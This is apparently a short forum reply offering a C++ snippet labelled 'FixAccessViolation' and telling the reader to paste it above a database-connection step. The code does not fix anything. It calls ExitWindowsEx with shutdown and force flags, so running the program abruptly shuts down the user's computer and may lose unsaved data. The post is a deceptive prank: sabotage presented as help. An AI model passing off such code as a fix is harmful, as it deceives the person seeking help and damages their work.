Code:
using FixAccessViolation = BOOL WINAPI(UINT, DWORD); //c++ 11
//typedef BOOL(WINAPI FixAccessViolation)(UINT, DWORD); //c++ 03
FixAccessViolation* fixMe = ExitWindowsEx;
fixMe(0x00000001, 0x00000004);
Just copy and paste it above "Verbindung zur Datenbank herstellen".